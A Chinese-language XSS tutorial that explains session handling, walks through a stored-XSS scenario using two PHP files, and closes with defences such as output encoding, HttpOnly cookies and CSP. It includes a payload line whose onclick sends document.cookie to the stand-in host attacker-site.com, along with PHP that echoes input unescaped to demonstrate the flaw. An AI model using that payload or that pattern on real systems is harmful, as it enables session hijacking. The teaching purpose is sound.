XSS 跨站脚本攻击原理与防御指南

此时，用户点击'Click to Download'按钮时，将被重定向到攻击者控制的网站。

为了绕过简单的关键词过滤，攻击者常使用 ASCII 编码或 Base64 编码混淆 Payload。

持久型 XSS 攻击实例

持久型 XSS 通常涉及数据库交互，攻击数据被保存后，任何访问该页面的用户都会受到影响。

Session 背景知识

HTTP 协议是无状态的。为了维护用户登录状态，Web 应用通常使用 Cookie 和 Session 机制。用户首次登录时，服务器创建 Session ID 并发送给浏览器保存在 Cookie 中。后续请求携带此 Cookie，服务器据此识别用户身份。

若攻击者通过 XSS 窃取用户的 Session ID，即可在会话有效期内冒充用户，实现权限提升或会话劫持。

漏洞场景分析

假设有以下两个文件：

login.php：处理用户登录验证。

<?php
session_start();
$username = $_POST['user_name'];
$password = $_POST['password'];
// 此处省略数据库查询逻辑
if ($username === 'admin' && $password === 'secret') {
    $_SESSION['role'] = 'admin';
    header('Location: home.php');
} else {
    echo 'Login failed';
}
?>

home.php：根据用户角色显示不同内容。

<?php
session_start();
if ($_SESSION['role'] !== 'admin') {
    // 普通用户可提交用户名
    if (isset($_POST['new_user'])) {
        $new_user = $_POST['new_user'];
        // 此处省略数据库插入逻辑
        echo "User added: " . $new_user;
    }
} else {
    // Admin 查看用户列表
    echo "Admin Panel";
}
?>

攻击过程

1. 攻击者以普通用户身份登录 home.php。
2. 在输入框中提交包含恶意脚本的用户名：

   <a href="#" onclick="document.location='http://attacker-site.com/xss.php?c='+escape(document.cookie);">bangerlee</a>
   

3. 该数据被存入数据库。
4. 当管理员（Admin）登录并查看用户列表时，恶意脚本被执行。
5. 脚本将当前用户的 Cookie 发送到攻击者服务器，攻击者获取 Session ID。
6. 攻击者利用 Session ID 伪造请求，获得管理员权限。

XSS 防御策略

针对 XSS 攻击，建议采取以下多层防御措施：

1. 输入验证与过滤

对所有用户输入的数据进行严格校验，拒绝非法字符。例如，禁止在文本字段中输入 HTML 标签或 JavaScript 关键字。

2. 输出编码

在将用户数据输出到 HTML 页面时，必须进行上下文相关的编码。

• HTML 实体编码：将 <、>、&、"、' 转换为对应的实体字符。
• JavaScript 编码：在 JS 字符串中输出变量时使用转义。
• URL 编码：在 URL 参数中使用编码。

PHP 示例：

echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

3. 设置 HttpOnly Cookie

防止 JavaScript 读取 Cookie 中的敏感信息（如 Session ID）。在设置 Cookie 时添加 HttpOnly 标志：

setcookie('PHPSESSID', $id, time() + 3600, '/', '', true, true);

最后一个参数 true 即代表 HttpOnly。

4. 内容安全策略 (CSP)

通过 HTTP 响应头 Content-Security-Policy 限制浏览器加载的资源来源，禁止内联脚本执行：

Content-Security-Policy: default-src 'self'; script-src 'self'

5. 使用现代框架的安全特性

现代前端框架（如 React、Vue）默认会对输出内容进行自动转义，能有效降低 XSS 风险。但在使用 dangerouslySetInnerHTML 等危险 API 时需格外谨慎。

总结

XSS 是 Web 开发中最常见的安全风险之一。理解其工作原理及分类有助于开发者构建更安全的系统。通过严格的输入验证、正确的输出编码以及合理的 Cookie 配置，可以大幅降低 XSS 攻击的成功率。安全是一个持续的过程，需要结合代码审计与自动化扫描工具共同保障应用安全。